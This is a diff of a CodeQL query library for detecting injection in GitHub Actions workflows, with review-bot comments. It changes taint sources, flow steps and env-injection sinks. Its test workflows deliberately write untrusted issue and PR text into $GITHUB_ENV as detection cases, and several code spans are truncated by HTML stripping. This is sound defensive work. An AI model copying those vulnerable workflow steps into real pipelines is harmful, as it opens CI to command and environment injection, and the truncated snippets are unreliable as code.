"github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", + ] + or + result = titleEvent() + or + result = urlEvent() + or + result = textEvent() + or + result = branchEvent() + or + result = labelEvent() + or + result = emailEvent() + or + result = usernameEvent() + or + result = pathEvent() } -bindingset[context] -private predicate jsonEvent(string context) { - exists(string reg | - reg = - [ - // json - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - 
"github\\.event\\.workflow_run\\.pull_requests", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) -} - -class GitHubSource extends RemoteFlowSource { +class GitHubCtxSource extends RemoteFlowSource { string flag; - GitHubSource() { + GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and @@ -212,14 +166,15 @@ class GitHubSource extends RemoteFlowSource { override string getSourceType() { result = flag } } -class GitHubEventSource extends RemoteFlowSource { +class GitHubEventCtxSource extends RemoteFlowSource { string flag; - GitHubEventSource() { - exists(Expression e, string context | + GitHubEventCtxSource() { + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and ( + // the context is available for the job trigger events exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and @@ -227,23 +182,25 @@ class GitHubEventSource extends RemoteFlowSource { ) or exists(e.getEnclosingCompositeAction()) - ) - | - titleEvent(context) and flag = "title" - or - urlEvent(context) and flag = "url" - or - textEvent(context) and flag = "text" - or - branchEvent(context) and flag = "branch" - or - labelEvent(context) and flag = "label" - or - emailEvent(context) and flag = "email" - or - usernameEvent(context) and flag = "username" - or - pathEvent(context) and flag = "filename" + ) and + ( + regexp = titleEvent() and flag = "title" + or + regexp = urlEvent() and flag = "url" + or + regexp = textEvent() and flag = "text" + or + regexp = branchEvent() and flag = "branch" + or + regexp = labelEvent() and flag = "label" + or + regexp = emailEvent() and flag = "email" + or + regexp = usernameEvent() and flag = "username" + or + regexp = pathEvent() and flag = "filename" + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") ) } 
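Review bot: The comment on `usernameEvent` (`All characters must be either a hyphen (-) or alphanumeric`) does not hold for the fields it covers: `head_commit.author.name`, `committer.name` and the `commits[]` / `workflow_run` variants are the free-form name fields of the git commit object, which anyone who can push sets to arbitrary text (quotes, `$(...)`, backticks included), not a GitHub login. Reword it to something like `// git author/committer names are free-form text taken from the commit, not GitHub logins; treat as fully attacker-controlled` so the "username" flag is not read downstream as a sanitised source. In `pathEvent`, `github.event.workflow_run.referenced_workflows` is, as far as I recall the webhook payload, an array of `{path, sha, ref}`, so `referenced_workflows\\.path` would miss the indexed access and should get the `\\[[0-9]+\\]` form used by `pages` and `commits` — worth confirming against the payload docs. The rest of `GitHubEventCtxSource` continues outside this hunk.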
@@ -258,17 +215,18 @@ class GitHubEventJsonSource extends RemoteFlowSource { this.asExpr() = e and context = e.getExpression() and ( - jsonEvent(context) and - ( - exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") - ) - or - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") - ) + // only contexts for the triggering events are considered tainted. + // eg: for `pull_request`, we only consider `github.event.pull_request` + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + or + // github.event is taintes for all triggers + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") ) and flag = "json" ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bbc40d56e2b4..4f4d80cc11bb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
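Review bot: The fallback pattern `wrapJsonRegexp("\\bgithub.event\\b")` leaves the dot unescaped, unlike every other pattern in this file (`github\\.event`), so it also matches identifiers such as `github_event` or `githubXevent` inside a `toJSON(...)`; it should read `wrapJsonRegexp("\\bgithub\\.event\\b")`. The comment above it has a typo (`taintes`) and, more usefully, could say what the branch now does after this change, since it only fires when `github.event` is the whole argument of `fromJSON`/`toJSON`, e.g. `// github.event passed whole to fromJSON()/toJSON() is tainted for every trigger in the data model`.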
@@ -32,15 +32,20 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + exists(Run run, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() + | ( - writeToGitHubEnv(run, _, value) or - writeToGitHubOutput(run, _, value) or - writeToGitHubPath(run, value) + writeToGitHubEnv(run, content) or + writeToGitHubOutput(run, content) ) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and - succ.asExpr() = run.getScriptScalar() + extractVariableAndValue(content, _, value) and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + writeToGitHubPath(run, content) and + value = content and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } 
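Review bot: Both `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` tests in `envToRunStep` are substring checks, so a step that only reads `$BODY_SHA` is treated as reading `$BODY`, and `$BODY` inside single quotes (never expanded by bash) also counts; a boundary-aware form such as `value.regexpMatch("(?s).*\\$(\\{|ENV\\{)?" + var_name + "\\b.*")` removes the first class of false positives without losing true hits. The same three-alternative pattern is duplicated in `envToOutputStoreStep`, `EnvVarInjectionFromEnvVarSink` and here, so one shared helper in Helper.qll would keep them from drifting apart. Also note that `$ENV{NAME}` is Perl syntax; if PowerShell `run:` steps are the target, the forms are `$env:NAME` and `${env:NAME}`, so this alternative is probably not matching what it was meant to — confirm which shell it was added for.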
@@ -55,25 +60,28 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=foo::$BODY" * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and succ.asExpr() = run and - writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - writeToGitHubEnv(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + isBashParameterExpansion(value, var_name, _, _) ) } @@ -83,25 +91,27 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * - run: echo "::set-output name=id::$( 0 + value.matches("$(echo %") and value.indexOf(var_name) > 0 ) ) } 
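Review bot: In `envToEnvStoreStep` the new `isBashParameterExpansion(value, var_name, _, _)` condition is strictly narrower than the `value.matches("%$" + ...)` test it replaces: `isBashParameterExpansion` is built on `regexpCapture`, which only holds when the whole string matches, so it accepts `$BODY` and `${BODY}` but rejects `prefix-$BODY`, `$BODY-suffix` and `$(echo $BODY)` — the last being exactly the shape the doc comment above `envToOutputStoreStep` gives as an example. Taint therefore stops flowing into the job env for those writes while `envToOutputStoreStep` in the same hunk keeps the substring form, so the two steps now classify the same `run` differently. Unless the narrowing is intended, keep `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` here too, or give `isBashParameterExpansion` a search (unanchored) variant. The second hunk on this line has lost characters to HTML stripping (`$( 0 + value.matches`), so its new code cannot be reviewed from this rendering.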
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 12919004c039..ead69480d8a5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,21 +9,23 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string varname, string key, string value | - expr = run.getInScopeEnvVarExpr(varname) and - writeToGitHubEnv(run, key, value) and + exists(Run run, Expression expr, string var_name, string content, string value | + expr = run.getInScopeEnvVarExpr(var_name) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } } class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 646dc35d1f4e..3349b5b11215 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
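Review bot: `EnvVarInjectionFromFileReadSink` still uses `value.regexpMatch([...cat\\s+...])`, and because `regexpMatch` is a whole-string match it only fires when the extracted value is exactly one command substitution; `sha=v$(cat file)` or `sha=$(cat file).$(date +%s)` are missed, while `EnvVarInjectionRunStep` in PoisonableSteps.qll (same commit) switched to an unanchored `matches`, so the two file-read heuristics now disagree on the same `run` step. Moving the check into one predicate in Helper.qll, e.g. `predicate isFileReadExpr(string value)`, and calling it from both sinks would keep the alert and the poisonable-step classification consistent. The `// TODO: add support for other commands like `<`, `jq`` comment is half done — `<` is already in the alternative list — so either trim it to `jq` or add `jq` here as PoisonableSteps did.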
@@ -5,7 +5,10 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] + [ + "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", + "ruby/setup-ruby", "actions/jekyll-build-pages" + ] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { @@ -70,14 +73,14 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { - exists(string value | + exists(string content, string value | // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + writeToGitHubEnv(this, content) and + extractVariableAndValue(content, _, value) and + value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") ) } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml index a112d4ee0f40..dafcd56bba91 100644 --- a/ql/test/library-tests/.github/workflows/multiline.yml +++ b/ql/test/library-tests/.github/workflows/multiline.yml 
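Review bot: The new heuristic in EnvVarInjectionRunStep, `value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%")`, drops the command-substitution anchor the removed regex required, so an ordinary assignment such as `MSG=concat them` or `NOTE=details here` satisfies `%cat %` / `%ls %` and marks the step as poisonable. EnvVarInjectionFromFileReadSink in the EnvVarInjectionQuery.qll hunk still requires `$(` or a backtick before `cat`/`<`, so the two file-read heuristics now disagree on the same script. Keeping the anchor while still gaining `ls` and `jq`, e.g. `value.matches("%" + ["$(", "`"] + ["ls ", "cat ", "jq ", "<"] + "%")`, keeps the two in step. The TODO about unsupported commands was removed together with the regex, but the list is still a fixed set, so the comment may be worth keeping.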
@@ -31,3 +31,59 @@ jobs: cat <<-"EOF" > event.json ${{ toJson(github.event) }} EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 20db431fc24e..18f72de36d11 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -4,18 +4,18 @@ files | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -30,7 +30,17 @@ steps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -48,7 +58,17 @@ runSteps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -64,7 +84,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
@@ -89,7 +109,27 @@ runStepChildren | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| 
.github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -141,37 +181,107 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | 
